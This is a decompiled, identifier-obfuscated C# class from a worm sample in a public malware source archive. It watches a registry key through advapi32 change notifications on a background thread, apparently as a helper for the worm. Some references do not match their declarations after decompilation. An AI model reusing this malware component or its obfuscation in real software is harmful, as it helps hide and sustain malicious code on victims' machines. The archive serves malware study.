mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-04 09:25:27 +00:00
222 lines
7.3 KiB
C#
222 lines
7.3 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Ҧ߲๒ʽ໙ୄᴘ.ᘽƭ
|
|||
|
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
|
|||
|
|
|||
|
using Microsoft.Win32;
|
|||
|
using System;
|
|||
|
using System.ComponentModel;
|
|||
|
using System.IO;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Threading;
|
|||
|
|
|||
|
namespace Ҧ߲๒ʽ໙ୄᴘ
|
|||
|
{
|
|||
|
public class ᘽƭ : IDisposable
|
|||
|
{
|
|||
|
private const int ሜኯᴭၚ໓ম\u1B7Eıᗝ = 1;
|
|||
|
private const int \u0D58Ꮈೇ\u00AEႍ = 16;
|
|||
|
private const int \u08D2ᰆ = 131072;
|
|||
|
private static readonly IntPtr ốኯՕằቜ\u0FC9ˡ = new IntPtr(int.MinValue);
|
|||
|
private static readonly IntPtr ᄉǹ\u05FFఔ = new IntPtr(-2147483647);
|
|||
|
private static readonly IntPtr \u1C31᪱ࢢ = new IntPtr(-2147483646);
|
|||
|
private static readonly IntPtr ምࢨញഥ = new IntPtr(-2147483645);
|
|||
|
private static readonly IntPtr ৰ\u139Fᙇ = new IntPtr(-2147483644);
|
|||
|
private static readonly IntPtr yଳጻഷቝ = new IntPtr(-2147483643);
|
|||
|
private static readonly IntPtr \u176D᧒ޢਕೆጾૐ = new IntPtr(-2147483642);
|
|||
|
private IntPtr \u0029Ѽ\u09D1ᚻ\u08BFჶ;
|
|||
|
private string ˣཐᛮ;
|
|||
|
private object ϒ\u0EDBไᏧ\u0CC5ᒎႛᬛ = new object();
|
|||
|
private Thread ݍࠗ\u0B98\u0FF8᳡ષρᎻ;
|
|||
|
private ManualResetEvent \u08F1ᤜᬯ = new ManualResetEvent(false);
|
|||
|
private \u187Bȸº᭰\u09FC Ẏᛑደ = \u187Bȸº᭰\u09FC.ഴᏮ\u18ABٞᴑ\u1C96ᦁྌᚳ | \u187Bȸº᭰\u09FC.ᰃ | \u187Bȸº᭰\u09FC.ཅ\u000A | \u187Bȸº᭰\u09FC.ẟᛗᚕ\u0C11ᘾ;
|
|||
|
|
|||
|
public ᘽƭ(RegistryKey registryKey) => this.\u05F8ᨅ᩵۷ኝ᭯(registryKey.Name);
|
|||
|
|
|||
|
public ᘽƭ(string name) => this.\u05F8ᨅ᩵۷ኝ᭯(name);
|
|||
|
|
|||
|
public ᘽƭ(RegistryHive registryHive, string subKey) => this.ᳶ\u1A8Cˉၕᖁ\u001Eඹᶋ(registryHive, subKey);
|
|||
|
|
|||
|
[DllImport("advapi32.dll", EntryPoint = "RegOpenKeyEx", SetLastError = true)]
|
|||
|
private static extern int ᴊזى\u0C70\u0DCE\u0DF4(
|
|||
|
IntPtr _param0,
|
|||
|
string _param1,
|
|||
|
uint ᅾፂÇ៌ڔᶷॠᯊ,
|
|||
|
int _param3,
|
|||
|
out IntPtr _param4);
|
|||
|
|
|||
|
[DllImport("advapi32.dll", EntryPoint = "RegNotifyChangeKeyValue", SetLastError = true)]
|
|||
|
private static extern int \u0731ᄦѧ\u08D2װ\u002Fᇣ(
|
|||
|
IntPtr _param0,
|
|||
|
bool _param1,
|
|||
|
\u187Bȸº᭰\u09FC _param2,
|
|||
|
IntPtr _param3,
|
|||
|
bool _param4);
|
|||
|
|
|||
|
[DllImport("advapi32.dll", EntryPoint = "RegCloseKey", SetLastError = true)]
|
|||
|
private static extern int ᦍ\u0008Տ\u0DF9ទƕ\u02FD(IntPtr _param0);
|
|||
|
|
|||
|
public event EventHandler ဧŕᬐ\u0AD4߭;
|
|||
|
|
|||
|
protected virtual void OnRegChanged()
|
|||
|
{
|
|||
|
EventHandler eventHandler = this.\u0BF1;
|
|||
|
if (eventHandler == null)
|
|||
|
return;
|
|||
|
eventHandler((object) this, (EventArgs) null);
|
|||
|
}
|
|||
|
|
|||
|
public event ErrorEventHandler ᑂϦڢྜƘ;
|
|||
|
|
|||
|
protected virtual void OnError(Exception e)
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
public void Dispose()
|
|||
|
{
|
|||
|
this.ᑺᆊᥖᅁỸਇয\u191F();
|
|||
|
GC.SuppressFinalize((object) this);
|
|||
|
}
|
|||
|
|
|||
|
public \u187Bȸº᭰\u09FC ܜᛓѕଢ਼֨᳑ᐱ
|
|||
|
{
|
|||
|
get => this.Ẏᛑደ;
|
|||
|
set
|
|||
|
{
|
|||
|
lock (this.ϒ\u0EDBไᏧ\u0CC5ᒎႛᬛ)
|
|||
|
this.Ẏᛑደ = value;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void ᳶ\u1A8Cˉၕᖁ\u001Eඹᶋ(RegistryHive ᜥᡉԭᒧך, string ධᜁᄜᅩᖙᙜ)
|
|||
|
{
|
|||
|
switch (ᜥᡉԭᒧך)
|
|||
|
{
|
|||
|
case RegistryHive.ClassesRoot:
|
|||
|
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ốኯՕằቜ\u0FC9ˡ;
|
|||
|
break;
|
|||
|
case RegistryHive.CurrentUser:
|
|||
|
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ᄉǹ\u05FFఔ;
|
|||
|
break;
|
|||
|
case RegistryHive.LocalMachine:
|
|||
|
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.\u1C31᪱ࢢ;
|
|||
|
break;
|
|||
|
case RegistryHive.Users:
|
|||
|
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ምࢨញഥ;
|
|||
|
break;
|
|||
|
case RegistryHive.PerformanceData:
|
|||
|
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ৰ\u139Fᙇ;
|
|||
|
break;
|
|||
|
case RegistryHive.CurrentConfig:
|
|||
|
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.yଳጻഷቝ;
|
|||
|
break;
|
|||
|
case RegistryHive.DynData:
|
|||
|
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.\u176D᧒ޢਕೆጾૐ;
|
|||
|
break;
|
|||
|
}
|
|||
|
this.ˣཐᛮ = ධᜁᄜᅩᖙᙜ;
|
|||
|
}
|
|||
|
|
|||
|
private void \u05F8ᨅ᩵۷ኝ᭯(string _param1)
|
|||
|
{
|
|||
|
string[] strArray = _param1.Split('\\');
|
|||
|
switch (strArray[0])
|
|||
|
{
|
|||
|
case "HKEY_CLASSES_ROOT":
|
|||
|
case "HKCR":
|
|||
|
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ốኯՕằቜ\u0FC9ˡ;
|
|||
|
break;
|
|||
|
case "HKEY_CURRENT_USER":
|
|||
|
case "HKCU":
|
|||
|
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ᄉǹ\u05FFఔ;
|
|||
|
break;
|
|||
|
case "HKEY_LOCAL_MACHINE":
|
|||
|
case "HKLM":
|
|||
|
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.\u1C31᪱ࢢ;
|
|||
|
break;
|
|||
|
case "HKEY_USERS":
|
|||
|
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ምࢨញഥ;
|
|||
|
break;
|
|||
|
case "HKEY_CURRENT_CONFIG":
|
|||
|
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.yଳጻഷቝ;
|
|||
|
break;
|
|||
|
default:
|
|||
|
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = IntPtr.Zero;
|
|||
|
break;
|
|||
|
}
|
|||
|
this.ˣཐᛮ = string.Join("\\", strArray, 1, strArray.Length - 1);
|
|||
|
}
|
|||
|
|
|||
|
public bool Ꮹ᷄ᡊ\u008Dᐳᆉܳ => this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ != null;
|
|||
|
|
|||
|
public void ůߝᨍ()
|
|||
|
{
|
|||
|
lock (this.ϒ\u0EDBไᏧ\u0CC5ᒎႛᬛ)
|
|||
|
{
|
|||
|
if (this.Ꮹ᷄ᡊ\u008Dᐳᆉܳ)
|
|||
|
return;
|
|||
|
this.\u08F1ᤜᬯ.Reset();
|
|||
|
this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ = new Thread(new ThreadStart(this.ဖཀྵ\u0F02̢᠗Ôଚ᭗ɭ));
|
|||
|
this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ.IsBackground = true;
|
|||
|
this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ.Start();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void ᑺᆊᥖᅁỸਇয\u191F()
|
|||
|
{
|
|||
|
lock (this.ϒ\u0EDBไᏧ\u0CC5ᒎႛᬛ)
|
|||
|
{
|
|||
|
Thread ݍࠗ᳡ષρᎻ = this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ;
|
|||
|
if (ݍࠗ᳡ષρᎻ == null)
|
|||
|
return;
|
|||
|
this.\u08F1ᤜᬯ.Set();
|
|||
|
ݍࠗ᳡ષρᎻ.Join();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void ဖཀྵ\u0F02̢᠗Ôଚ᭗ɭ()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
this.ۺ៝\u05BE᭬ქ();
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
this.OnError(ex);
|
|||
|
}
|
|||
|
this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ = (Thread) null;
|
|||
|
}
|
|||
|
|
|||
|
private void ۺ៝\u05BE᭬ქ()
|
|||
|
{
|
|||
|
IntPtr num;
|
|||
|
int error1 = ᘽƭ.ᴊזى\u0C70\u0DCE\u0DF4(this.\u0029Ѽ\u09D1ᚻ\u08BFჶ, this.ˣཐᛮ, 0U, 131089, out num);
|
|||
|
if (error1 != 0)
|
|||
|
throw new Win32Exception(error1);
|
|||
|
try
|
|||
|
{
|
|||
|
AutoResetEvent autoResetEvent = new AutoResetEvent(false);
|
|||
|
WaitHandle[] waitHandles = new WaitHandle[2]
|
|||
|
{
|
|||
|
(WaitHandle) autoResetEvent,
|
|||
|
(WaitHandle) this.\u08F1ᤜᬯ
|
|||
|
};
|
|||
|
while (!this.\u08F1ᤜᬯ.WaitOne(0, true))
|
|||
|
{
|
|||
|
int error2 = ᘽƭ.\u0731ᄦѧ\u08D2װ\u002Fᇣ(num, true, this.Ẏᛑደ, autoResetEvent.SafeWaitHandle.DangerousGetHandle(), true);
|
|||
|
if (error2 != 0)
|
|||
|
throw new Win32Exception(error2);
|
|||
|
if (WaitHandle.WaitAny(waitHandles) == 0)
|
|||
|
this.OnRegChanged();
|
|||
|
}
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
if (num != IntPtr.Zero)
|
|||
|
ᘽƭ.ᦍ\u0008Տ\u0DF9ទƕ\u02FD(num);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|